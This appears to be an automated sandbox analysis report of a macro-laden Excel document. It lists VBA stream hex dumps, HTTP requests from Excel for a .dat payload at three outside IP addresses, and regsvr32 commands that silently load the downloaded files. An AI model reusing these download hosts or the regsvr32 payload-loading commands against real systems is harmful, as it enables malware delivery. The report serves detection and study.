    Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ J . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 04 00 00 00 00 00 01 00 02 00 04 00 00 00 00 00 01 00 00 00 05 00 00 00 00 00 01 00 02 00 05 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 158
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
    File Type:data
    Stream Size:158
    Entropy:1.51849967362
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 361
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
    File Type:data
    Stream Size:361
    Entropy:2.18989522343
    Base64 Encoded:False
    Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 356
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
    File Type:data
    Stream Size:356
    Entropy:1.93515224578
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 170
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_4
    File Type:data
    Stream Size:170
    Entropy:1.63817063364
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . 2 . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 10 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 156
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_5
    File Type:data
    Stream Size:156
    Entropy:1.63365900945
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 04 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1097
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/dir
    File Type:data
    Stream Size:1097
    Entropy:6.70583195188
    Base64 Encoded:True
    Data ASCII:. E . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . 7 5 . U c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
    Data Raw:01 45 b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 37 35 a0 55 63 01 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Oct 6, 2021 17:49:02.635343075 CEST4916780192.168.2.22190.14.37.107
    Oct 6, 2021 17:49:02.820914030 CEST8049167190.14.37.107192.168.2.22
    Oct 6, 2021 17:49:02.821108103 CEST4916780192.168.2.22190.14.37.107
    Oct 6, 2021 17:49:02.822520018 CEST4916780192.168.2.22190.14.37.107
    Oct 6, 2021 17:49:03.008789062 CEST8049167190.14.37.107192.168.2.22
    Oct 6, 2021 17:49:03.632167101 CEST8049167190.14.37.107192.168.2.22
    Oct 6, 2021 17:49:03.632419109 CEST4916780192.168.2.22190.14.37.107
    Oct 6, 2021 17:49:03.661942959 CEST4916880192.168.2.2294.140.114.111
    Oct 6, 2021 17:49:03.707320929 CEST804916894.140.114.111192.168.2.22
    Oct 6, 2021 17:49:03.708038092 CEST4916880192.168.2.2294.140.114.111
    Oct 6, 2021 17:49:03.708863020 CEST4916880192.168.2.2294.140.114.111
    Oct 6, 2021 17:49:03.754745007 CEST804916894.140.114.111192.168.2.22
    Oct 6, 2021 17:49:03.827230930 CEST804916894.140.114.111192.168.2.22
    Oct 6, 2021 17:49:03.827404022 CEST4916880192.168.2.2294.140.114.111
    Oct 6, 2021 17:49:03.848263025 CEST4916980192.168.2.22188.165.62.50
    Oct 6, 2021 17:49:03.873059988 CEST8049169188.165.62.50192.168.2.22
    Oct 6, 2021 17:49:03.873236895 CEST4916980192.168.2.22188.165.62.50
    Oct 6, 2021 17:49:03.873933077 CEST4916980192.168.2.22188.165.62.50
    Oct 6, 2021 17:49:03.898515940 CEST8049169188.165.62.50192.168.2.22
    Oct 6, 2021 17:49:04.062262058 CEST8049169188.165.62.50192.168.2.22
    Oct 6, 2021 17:49:04.062339067 CEST4916980192.168.2.22188.165.62.50
    Oct 6, 2021 17:50:08.638166904 CEST8049167190.14.37.107192.168.2.22
    Oct 6, 2021 17:50:08.638524055 CEST4916780192.168.2.22190.14.37.107
    Oct 6, 2021 17:50:08.828970909 CEST804916894.140.114.111192.168.2.22
    Oct 6, 2021 17:50:08.829133987 CEST4916880192.168.2.2294.140.114.111
    Oct 6, 2021 17:50:09.062952042 CEST8049169188.165.62.50192.168.2.22
    Oct 6, 2021 17:50:09.063263893 CEST4916980192.168.2.22188.165.62.50
    Oct 6, 2021 17:51:02.526983976 CEST4916980192.168.2.22188.165.62.50
    Oct 6, 2021 17:51:02.527353048 CEST4916880192.168.2.2294.140.114.111
    Oct 6, 2021 17:51:02.527673960 CEST4916780192.168.2.22190.14.37.107
    Oct 6, 2021 17:51:02.551896095 CEST8049169188.165.62.50192.168.2.22
    Oct 6, 2021 17:51:02.575489044 CEST804916894.140.114.111192.168.2.22
    Oct 6, 2021 17:51:02.713582993 CEST8049167190.14.37.107192.168.2.22

    HTTP Request Dependency Graph

    • 190.14.37.107
    • 94.140.114.111
    • 188.165.62.50

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249167190.14.37.10780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Oct 6, 2021 17:49:02.822520018 CEST0OUTGET /44475.7418916667.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 190.14.37.107
    Connection: Keep-Alive
    Oct 6, 2021 17:49:03.632167101 CEST1INHTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 06 Oct 2021 15:49:03 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.16
    Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
    Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0


    Session IDSource IPSource PortDestination IPDestination PortProcess
    1192.168.2.224916894.140.114.11180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Oct 6, 2021 17:49:03.708863020 CEST1OUTGET /44475.7418916667.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 94.140.114.111
    Connection: Keep-Alive
    Oct 6, 2021 17:49:03.827230930 CEST2INHTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 06 Oct 2021 15:49:03 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.16
    Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
    Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0


    Session IDSource IPSource PortDestination IPDestination PortProcess
    2192.168.2.2249169188.165.62.5080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Oct 6, 2021 17:49:03.873933077 CEST2OUTGET /44475.7418916667.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 188.165.62.50
    Connection: Keep-Alive
    Oct 6, 2021 17:49:04.062262058 CEST3INHTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 06 Oct 2021 15:49:04 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.16
    Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
    Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0


    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:17:48:16
    Start date:06/10/2021
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13fcd0000
    File size:28253536 bytes
    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:17:48:21
    Start date:06/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac
    Imagebase:0xffb40000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:17:48:21
    Start date:06/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac1
    Imagebase:0xffb40000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:17:48:21
    Start date:06/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac2
    Imagebase:0xffb40000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis

    Reset < >